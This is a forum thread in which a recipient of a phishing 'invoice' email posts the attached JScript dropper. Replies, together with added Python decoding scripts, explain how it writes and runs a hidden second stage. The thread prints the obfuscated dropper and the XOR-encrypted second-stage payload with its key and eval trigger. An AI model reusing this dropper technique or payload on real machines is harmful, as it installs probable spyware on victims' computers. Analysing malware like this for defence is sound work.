Thread: Strange Email

Status
Thread closed to further replies.

Nicholas26

Electrum user
5 November 2011
Hi everyone. I'm urgently looking for a Java programmer who can explain to me what is happening to me.
I received this email with a zip attachment:

"
Dear customer!

with reference to Resolution no. 1443 of 25/11/15
we are sending you our invoice electronically
All the information is stored in our application

Best regards

Accountancy. "


From this email: [email protected]


It has a file that I don't want to post here. If the rules say I can't post the email address of whoever wrote to me, tell me and I'll remove it, but don't delete the post because I want to understand what they want from me.

The file contains a .txt that says "documento 1443" and a file with the same name ending in .pdf.js (I wasn't fooled, I immediately realised it was a js and not a pdf, so to be safe I opened it in Notepad++ to look at the code).
I'm posting it here and I hope someone can tell me what that file does.

// The "//// xxxx" lines are filler inserted by the obfuscator; they do nothing.
var cGYRqYryEmKt = new ActiveXObject("WScript.Shell");            // Windows Script Host shell: env vars + process launch
oCTwkO = cGYRqYryEmKt.ExpandEnvironmentStrings("%TEMP%") + "\\ssd" + Math.round(1e8 * Math.random()); // drop path: %TEMP%\ssd<random>
var UzaMiXCfxxZi0 = new ActiveXObject("Msxml2.DOMDocument.6.0");  // MSXML, used only as a Base64 decoder
var ZHQXedXbLbz = new ActiveXObject("ADODB.Stream");              // binary stream used to write the decoded bytes to disk
//// KiU13559
//// LkUiAaxe7zZFVgz4
var iweBpSf = UzaMiXCfxxZi0.createElement("tmp");
iweBpSf.dataType = "bin.base64";                                  // nodeTypedValue will return the Base64-decoded bytes of .text
//// 6sJqYmhXsl
//// ri7PHQIQvf3eFrJJwV
ZHQXedXbLbz.Type = 1;                                             // adTypeBinary
//// hrHP0UVjbfbiN496kt
iweBpSf.text = "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"; // Base64 of the second stage (blob not reproduced here)
ZHQXedXbLbz.Open();
//// 45SXlth
//// rW2egl
ZHQXedXbLbz.Write(iweBpSf.nodeTypedValue);                        // decoded payload goes into the stream
oCTwkO = oCTwkO + ".js";
ZHQXedXbLbz.SaveToFile(oCTwkO, 2);                                // adSaveCreateOverWrite: write %TEMP%\ssd<random>.js
ZHQXedXbLbz.Close();
//// jsAEiSHdZq5wnHsVUN
//// 4d8iJ8xEDe9u7
cGYRqYryEmKt.Run(oCTwkO, 0, 0);                                   // run the dropped .js with window style 0 (hidden), don't wait
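The dropper above never decodes anything in JavaScript itself: it hands the Base64 text to an MSXML element whose dataType is "bin.base64", reads the decoded bytes back through nodeTypedValue, writes them with ADODB.Stream to %TEMP%\ssd<random>.js and launches that file through WScript.Shell.Run with window style 0 (hidden). The script below is an added example (not code from the thread) that recovers the same bytes offline and records the static indicators an analyst would note, without executing anything. Because the real Base64 blob is not reproduced on the page, the sample dropper text is constructed in the same shape as the posted one, with a harmless placeholder payload.

```python
"""Static unpacking of a WSH/JScript dropper of the kind posted above.
Added example, not code from the thread. Nothing is executed."""
import base64
import re
from typing import Optional

# Constructed sample in the shape of the posted dropper. The payload is a
# harmless placeholder because the real Base64 blob is not on the page.
STAGE2_PLACEHOLDER = 'WScript.Echo("constructed stage-2 placeholder");'
SAMPLE_DROPPER = (
    'var cGYRqYryEmKt = new ActiveXObject("WScript.Shell");\n'
    'oCTwkO = cGYRqYryEmKt.ExpandEnvironmentStrings("%TEMP%") + "\\\\ssd" + Math.round(1e8 * Math.random());\n'
    'var UzaMiXCfxxZi0 = new ActiveXObject("Msxml2.DOMDocument.6.0");\n'
    'var ZHQXedXbLbz = new ActiveXObject("ADODB.Stream");\n'
    '//// KiU13559\n'
    'var iweBpSf = UzaMiXCfxxZi0.createElement("tmp");\n'
    'iweBpSf.dataType = "bin.base64";\n'
    'ZHQXedXbLbz.Type = 1;\n'
    '//// hrHP0UVjbfbiN496kt\n'
    'iweBpSf.text = "' + base64.b64encode(STAGE2_PLACEHOLDER.encode()).decode() + '";\n'
    'ZHQXedXbLbz.Open();\n'
    'ZHQXedXbLbz.Write(iweBpSf.nodeTypedValue);\n'
    'oCTwkO = oCTwkO + ".js";\n'
    'ZHQXedXbLbz.SaveToFile(oCTwkO, 2);\n'
    'ZHQXedXbLbz.Close();\n'
    'cGYRqYryEmKt.Run(oCTwkO, 0, 0);\n'
)

JUNK_COMMENT = re.compile(r'^\s*////.*$', re.MULTILINE)          # "//// xxxx" filler lines
ACTIVEX = re.compile(r'new\s+ActiveXObject\(\s*"([^"]+)"\s*\)')   # COM ProgIDs the script instantiates
B64_TEXT = re.compile(r'\.text\s*=\s*"([A-Za-z0-9+/=\s]+)"')      # Base64 assigned to the MSXML element
HIDDEN_RUN = re.compile(r'\.Run\(\s*[^,()]+,\s*0\s*,')            # WScript.Shell.Run(path, 0, ...) = hidden window


def strip_junk_comments(src: str) -> str:
    """Remove the '//// <random>' filler lines the obfuscator sprinkles between statements."""
    return JUNK_COMMENT.sub('', src)


def extract_stage2(src: str) -> Optional[bytes]:
    """Return the bytes MSXML would produce from the bin.base64 element, or None."""
    m = B64_TEXT.search(src)
    if not m:
        return None
    b64 = re.sub(r'\s+', '', m.group(1))
    # MSXML tolerates missing '=' padding; base64.b64decode does not, so restore it.
    b64 += '=' * (-len(b64) % 4)
    return base64.b64decode(b64)


def triage(src: str) -> dict:
    """Collect the static indicators of this dropper family."""
    clean = strip_junk_comments(src)
    stage2 = extract_stage2(clean)
    return {
        'progids': sorted(set(ACTIVEX.findall(clean))),
        'drops_to_temp': '%TEMP%' in clean and 'SaveToFile' in clean,
        'hidden_run': HIDDEN_RUN.search(clean) is not None,
        'stage2': stage2.decode('latin-1') if stage2 is not None else None,
    }


if __name__ == '__main__':
    for key, value in triage(SAMPLE_DROPPER).items():
        print(f'{key}: {value}')
```

Run against the real .pdf.js (after putting the Base64 blob back in place of the placeholder) the `stage2` entry is the script that would have landed in %TEMP%; save it to a file and look at it there rather than letting WScript run it.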
Java and JavaScript are two completely different languages. They share the same root in the name, but they have nothing at all in common.
Anyway, that code is malware:
that long string you see is nothing but the Base64 encoding of the following code:
Code:
var qtcStOqfLO = '5srGjsbyPBUOQJy27cB';   // XOR key
var yjrWL = 'C\x27\x1f-; \x0f\x0fhbhos\x03-\x00\x02Rs\x17H\x7fMgy\x04\x0c>!!&>$YDc\x0e(d \x1f1_[\x14-=(\x04\x1c<<O\x1b\x17\x18O?\x5c]hESWHg\x08\x1e# \x1b\x13J\x05,1b\x028J`\x5cMV\x7fb:63\x13\x1cgP\x0b)8yRgJS\x10\x1c$7\x27!q$\x1cE\x17"!A\x1a\x04"2<\x00\x135!!g\x27\x1e\x14Xf0/CE[J`\x0eYtZO_)$$\x1aF^\x0c,\x15\x05&*\x00"1\x14&j\x0f\x01>\x05\x03k\x7f5k\x15\x08\x7fMJSBY&#\x27o\x27\x1e\x14Xf0/CGRzJT\x03\x05~s\x097`{%J\x06P$E^H\x1b\x12B\x07%(s`/\x0d2H\x05\x16X\x1eMC\x13\x10UPAZ\x12\x0c\x097`\x7f#nOSvi\x0bCu\x1e\x18LD\x0c:e}\x0d2ISW\x0aso/\x0aw^/\x1aHe:vlr6\x13\x04\x02?:\x05J.?[K\x02\x0cyz\x097a/%J\x06T6i\x0bCpGU>\x01`r\x02priZRTQwi\x0bB%6\x0bS\x1b+<\x19x\x0d2I\x0ak\x1bs\x02KAdIP\x16\x04\x0c:gxk\x16\x01\x03R?:\x04\x11\x08*6\x0bPNh\x1e-\x7fc\x16\x01\x03Q\x02\x1eMBEfQ/\x1aI1\x15jlri\x01J\x0dZ\x1eMBF\x1b\x12C\x03%(s79ay3b\x14@aI\x19Dr6\x0bR@\x0c:dw1?P\x0ak\x1brP/\x0av]\x07>\x01auxi\x0d2I\x02`\x5ce\x1b\x00\x02+\x03\x07J[savmxqt8\x18Lm\x1aS%7\x1d\x15&\x1294$)\x19\x27\x1e~:im\x1a\x5c]g\x087;6\x1f4!<+Gs\x12\x17Cb\x5c\x15Ro0=\x0d6*\x1b\x1d\x19qwD\x12\x15Ak\x15\x08\x7fME\x5cMVp4 \x27e!LQ~7\x278y]hE\x5cB2\x17\x18\x01~\x17\x10;f^\x09sW~xgJSBYpbu#\x01<1C|\x051@SOgH]@Y{bw+sjR\x12\x15\x0f`\x15XRe\x06QYtZbuoq7YW[\x10\x27\x15\x08\x7fMJSBYpbuo=\x1a\x0fzF($F\x06RzJQL[pium!hY\x19\x17A&\x17SYgH\x15@B]Huoqj\x04\x09:ib\x15SR!\x05\x01BQ&#\x27o\x05=\x03Uv;\x04g\x27\x1a?+S_Y`yu\x1b&0\x1eso%\x10a\x1b\x0a\x06JOB\x0f\x04/?\x1e\x02\x27\x0f\x06\x19\x0f\x27[\x14\x06/QS6\x0e*%\x14\x17\x17\x18-ZO"i\x1eZR<gyBYpbuoqj\x0fSEC1D\x03#\x123+\x18\x1d5;<\x02\x190Y\x0f\x17\x15\x16X\x19#\x14\x07\x05WQr\x15\x06,##\x09F\x190*P\x1f\x1eeCHos\x7fmz`q|@abT-}"\x02r:\x18:tZmz`~jH{S$6e\x12\x1a\x12X\x14%\x0117XEqjY\x12\x17Cb\x15*\x13\x11)1&\x0f%8urq9\x08Bf6\x1bm\x09\x16"\x13\x1a/1*l\x107!+\x17Vr\x0d4\x5c\x01\x1d)\x07\x16\x0c\x0d\x036\x27&?-\x0a\x1a\x15F\x16p>"bHZBRp`\x09\x13sjR\x12z\x026]]\x00(\x1f\x1d\x06Qa\x27mo{j4SC\x0blG\x12\x1c#\x05\x1eJPyb~o=\x1a\x0fzF($F\x06IJ`SBYpbuoq\x1c\x1eyo:)\x15NR!\x0b\x1f\x11\x1ckO_oqjY\x12\x17CbC\x27\x1f-; \x0f\x0f`bho\x27\x1e\x14Xf0/CFZe\x27 :4\x1cp{\x17\x1c\x061fc3`\x1cH\x7fME\x5cMVp\x0d/\x27\x15\x04.f:im\x1a\x5c]g\x0fA\x09H6w\x277\x5c@Y\x12\x17Cb\x15SR1>\x1e\x08(\x03/#\x7f\x7f%\x17@R\x02&L\x00\x06&\x1e\x16\x01\x111,2*qwYTB\x0d!A\x1a\x1d)BZB\x02]HuoqjY\x12\x17Cb\x15SR.\x0cSJMp\x7fho\x27\x1e\x14Xf0/CC\x5c5\x0f\x12\x06\x00\x0364;4j_\x14\x17Qr\x05SOzJ\x056\x14:\x13\x06"\x27zWAC\x026@\x00[g\x11~hYpbuoqjY\x12\x17Cb\x15SRg\x1c\x12\x10Y&\x168%\x00\x19\x14D\x06C\x7f\x15\x05&*\x00"1\x14&w}m\x10\x0e6vuM\x11A\x01\x17&\x07QKB]HuoqjY\x12\x17Cb\x15SRgJSB\x106b}9\x05\x27\x13cd\x0e4\x04]\x1d7\x0f\x1dJP|b#\x1b< (aZ\x15s\x1b\x07\x0b7\x0fS_Yanu9\x05\x27\x13cd\x0e4\x04]\x055\x03\x07\x07Q&\x168%\x00\x19\x14D\x07M\x10P\x00\x02(\x04\x00\x07;?&,f}jLW\x04C~\x15\x05&*\x00"1\x14&s{<80\x1c\x1b\x17\x18O?SRgJSBYpbuoqjY\x12\x17Cb\x15S$ !+;\x12p\x7fu;#?\x1c\x09:ib\x15SRgJSBYpbuoqjY\x12\x17CbC\x27\x1f-; \x0f\x0fal% "#\x0d[X\x0db\x08SB|gyBYpbuoqjY\x12\x17Cb\x15SRgJSB\x0f\x04/?\x1e\x02\x27\x0f\x03\x19\x10#C\x16&(,\x1a\x0e\x1cx\x1b4\x19\x12\x08=DB\x19n\x15A[|gyBYpbuoqjY\x12\x17Cb\x15SRgJSB\x0d";u4\x5c@p;>jK\x15SRg\x03\x15BQ\x0a\x0c:\x00+\x131d\x17^\x7f\x15QPnJ\x08osYK\x5cFXCpAF\x13\x13`**=\x0e\x16\x1b\x10\x1d\x0a/a\x142\x1cQ\x1fA0@\x1d\x16+\x06@PYrb~o\x08+/qu\x274@\x09RlJQNYrb~os\x0e\x15^e\x06%\x5c\x00\x06"\x18 \x07\x0b&\x27\x27mxqt8\x18Lm\x1aS\x07\x0b\x1d\x03U\x1fg#a&\x08\x12MTN0)c<\x7fME\x5cMVp\x03\x1d+a{\x16yd\x0c/8y{NczkYpbu2q/\x15ARC98y{NczkYpbuoqjYAF\x13\x13`**=\x0e\x16\x1b\x10\x1d\x0a/a\x03?\x17\x1an\x02\x14v161\x1f\x09NYanu\x7fxqt8>jK<zRgJS\x1fB]HuoqjY\x12\x17Cb\x15SRgJSBYpbu2q)\x18FT\x0bb\x1d\x05&*\x00"1\x14&p|o*Gs\x12\x17Cb\x15SRgJSBYpbuoqjY\x12\x17Cb\x15~xgJSBYpbuoqjY\x12\x17Cb\x15SRg\x17HospbuoqjY\x12\x17Cb\x15SRgJ\x0eospbuoqjY\x12\x17Cb\x15SRgJ\x056\x14:\x13\x06"\x27{WQ[\x0c1P[[J`SBYpbuoqjY\x12\x17\x1eO?SRgJSBYp?nB[jY\x12\x17Cb\x15S\x065\x13S\x19tZbuoqjY\x12\x17Cb\x15S\x04&\x18S\x13\x0d3\x11!\x00 ,5}\x17^b\x12FK%\x1e48^kO_oqjY\x12\x17Cb\x15SRg\x1c\x12\x10Y)(\x27\x18\x1djD\x12A7/_"!*\x1cG9-\x2782\x0e\x09\x0c+f_\x1b\x03hH\x7fME\x5cMVp\x01\x1a|\x1b NVx\x08\x1bq&\x1d\x0d\x27J+\x1c\x11uXE~eV\x1d\x17,8a\x04\x18\x01_+W\x14\x1e5\x0f\x0d\x10\x12\x15a:ib\x15SRgJSBYpbu)>8Y\x1aA\x020\x15\x05"=>\x1c\x04!:4<*:jD\x12\x15An\x15%9\x17:4\x105\x01\x27&.gjD\x12\x07Obc8"\x17-\x01.(514xqwY\x02\x0cC\x14~#"\x00\x18?3\x1c##comj\x00XE4\x0e\x1b\x1f\x17)\x0d\x07\x0aBp\x14\x1e\x1f\x01\x0d\x0b~f\x061TEYlCS\x14)*\x16:)\x09 \x0f[R\x08b\x1eNR\x14\x1e\x01\x0b\x177l3=>\x27:ZV\x11\x01Z\x17\x17o\x13\x19\x10.\x1cl6\x2708:]S\x06\x03A[$\x0c:#%\x0b\x1c\x130<0|P\x12iC3A\x10!3%\x02\x045\x1fl6\x2708:]S\x06\x03A[$\x0c:#%\x0b\x1c\x130<0}P\x1b\x1bC\x14~#"\x00\x18?3\x1c##bdzfYd|3\x12r\x01>\x16\x0f\x00\x03Np\x7fho >\x1aaC,3S?=i\x06\x16\x0c\x1e$*uiwjQd|3\x12r\x01>\x16\x0f\x00\x03Np\x7fu\x7fxqt8\x17Cb\x15SRgJSBYp4\x01";\x1b*_ATb\x08SP/\x1e\x07\x12C\x7fmwozj\x0fbM7-S+\x181\x03\x16\x09Y{bw`#/\x1d[EAb\x1eSPiHSIYr2wozj[Z\x15Ci\x15Q\x02eQ~hYpbuoqjY\x12\x17CbC\x27\x1f-; \x0f\x0f`l:?4$Q\x10g,\x11aQ^g\x1c\x27\x0f\x13\x01\x1189ffYTV\x0f1PZIJ`SBYpbuoqjY\x12\x17\x15\x16X\x19#\x14\x07\x05RW#\x27!\x1d4;\x0cWD\x17\x0aP\x12\x16"\x18[@:?,!*?>TfN\x13\x27\x17_Re\x0b\x03\x12\x159!4;8%\x17\x1dON5B\x04_!\x05\x01\x0fT%09*?)\x16VR\x07`\x1cH\x7fMJSBYpbuoqjY\x12A7/_"!*\x1cCL\x0a5,1gs!\x13eU;5g)\x27\x0f>\x07,\x1fm`udq\x07\x18F_M0T\x1d\x16(\x07[KY{bwi;$\x1dX\x0aAb\x1eS\x04\x13\x07\x193*=4mozj#|X,8l;$nQ~hYpbuoqjYO\x17\x00#A\x10\x1agB\x056\x14:\x13\x06"\x27yP\x12LnH8yRgJSBYpb(t\x5c@t8\x18Lm\x1aS\x0a\x11\x100%\x10\x07\x07\x04=f!\x0aG^\x16O?\x5c]hES8\x1d%6az0 \x13q:ib\x15SRgJSB\x106b}\x196\x01!k\x5cJbN~xgJSBYpbuoqjYPE\x06#^H\x7fMJSBYpbuo,qt8\x18Lm\x1aS\x02r\x0f7P\x00\x004l&\x18Gs\x1d\x18Lm\x15\x16\x03p\x12\x14\x1a5\x04\x05\x1dB[jY\x12\x17\x1ey8y\x0f|gyos&\x168%\x00\x19\x14D\x1fA`\x1cH\x7fM\x1c\x27\x0f\x13\x01\x1189yh_\x5cT\x0e\x7fV1$\x03( :[yy';

// Character-by-character XOR of yjrWL with qtcStOqfLO: VKPPGrLQesa6 indexes the
// ciphertext, VKPPGrLQesa7 indexes the key and is reset to 0 when it reaches the key length.
for (var vPzTofXjviek = "", VKPPGrLQesa6 = 0, VKPPGrLQesa7 = 0; VKPPGrLQesa6 < yjrWL.length; VKPPGrLQesa6++)
    vPzTofXjviek += String.fromCharCode(yjrWL.charCodeAt(VKPPGrLQesa6) ^ qtcStOqfLO.charCodeAt(VKPPGrLQesa7)), VKPPGrLQesa7++, VKPPGrLQesa7 == qtcStOqfLO.length && (VKPPGrLQesa7 = 0);

function IKThCS() { return 'e'; };
function SQulVk() { return 'val'; };
this[IKThCS() + SQulVk()](vPzTofXjviek);   // this["eval"](decoded): runs the decoded script
This other code contains another very long string and a for loop. It is saved to a file in the TEMP directory and then executed.
At the bottom there's the definition of two functions, which do nothing but return (together) the string "eval". This string is the name of the function that is called afterwards. So the last three statements correspond to:
Code:
eval(long-string);
which does nothing but execute the code inside the parentheses.
That long string, however, is not passed to the eval function as you see it written: the for loop above it does nothing but bitwise XOR the long string with the first character of that small string you find at the top (i.e. '5') [I think it only ever takes the first character: it doesn't iterate over the following ones - but at this hour I'm also pretty tired, so you never know]. The result is executed.

All this behaviour is already enough to understand that it's malware. To see exactly what the final code that gets launched is, you'd have to take all the characters of the long string one by one and XOR them with the ASCII value of the character '5'. Right now, though, I don't feel like / don't have time to do it: if you really want to know in detail what it does you can do it yourself - otherwise, if I feel like it, I'll do it tomorrow (or someone else on inforge less lazy than me will). But honestly you're better off just trashing that email and being done with it.
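Here is the decode step from the reply above, written out as an added example (not code from the thread) so that anyone can recover the final script offline instead of letting eval run it. It reproduces the posted for loop literally: each ciphertext character is XORed with the key character at index j, and j is incremented after every character and reset to 0 when it reaches the key length, so the whole 19-character key '5srGjsbyPBUOQJy27cB' is cycled over the string (repeating-key XOR). KEY is the posted key; CIPHERTEXT_PREFIX is the first 44 characters of the posted string, copied verbatim (the \x escapes mean the same in JavaScript and Python literals). The printable-ratio check is an added sanity test: readable script source scores 1.0, a wrong key schedule does not.

```python
"""Decoder for the XOR'd second stage posted above.
Added example, not code from the thread; nothing is evaluated."""
from typing import Tuple

KEY = '5srGjsbyPBUOQJy27cB'   # the posted key (qtcStOqfLO)
# First 44 characters of the posted string (yjrWL), copied verbatim.
CIPHERTEXT_PREFIX = 'C\x27\x1f-; \x0f\x0fhbhos\x03-\x00\x02Rs\x17H\x7fMgy\x04\x0c>!!&>$YDc\x0e(d \x1f1_['


def xor_decode(ciphertext: str, key: str) -> str:
    """Repeating-key XOR exactly as the posted loop performs it."""
    if not key:
        raise ValueError('empty key')
    out = []
    j = 0                                   # key index (VKPPGrLQesa7 in the post)
    for ch in ciphertext:
        out.append(chr(ord(ch) ^ ord(key[j])))
        j += 1
        if j == len(key):                   # wrap to the start of the key
            j = 0
    return ''.join(out)


def printable_ratio(text: str) -> float:
    """Fraction of characters that are printable or ordinary whitespace.
    Decoded script source should score 1.0; garbage scores noticeably lower."""
    if not text:
        return 0.0
    ok = sum(1 for c in text if c.isprintable() or c in '\r\n\t')
    return ok / len(text)


def decode_and_check(ciphertext: str, key: str) -> Tuple[str, float]:
    """Decode and return (plaintext, printable_ratio) so a caller can judge the key."""
    plain = xor_decode(ciphertext, key)
    return plain, printable_ratio(plain)


if __name__ == '__main__':
    plain, score = decode_and_check(CIPHERTEXT_PREFIX, KEY)
    print(repr(plain), score)
    # For comparison, XOR with only the first key character yields unreadable bytes.
    print(repr(xor_decode(CIPHERTEXT_PREFIX, KEY[0])), printable_ratio(xor_decode(CIPHERTEXT_PREFIX, KEY[0])))
```

To decode the whole second stage, paste the complete yjrWL literal in place of CIPHERTEXT_PREFIX and write the result to a file; the last line of the posted script (this["eval"](...)) is the only thing that turns the decoded text into running code, so leaving it out keeps the analysis static.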

Thanks for the reply, I just wonder how they managed to find my email and what that malware could be used for!


Sent from my iPhone using Tapatalk

Thanks for the reply, I just wonder how they managed to find my email and what that malware could be used for!
They find the email addresses on the web, in the contact lists of other people they've infected (worm), or they simply generate them randomly. Receiving these emails is normal - it's nothing strange. They're simply trying to infect random people. That code is probably spyware (like most malware going around today) that tries to steal sensitive data and information (saved passwords, credit cards, etc.) and maybe, indeed, a worm - that is, one that takes your saved contact list so as to then have a list of other addresses to send the malware to.
Don't be surprised. You'll receive plenty of similar emails in your life - guaranteed.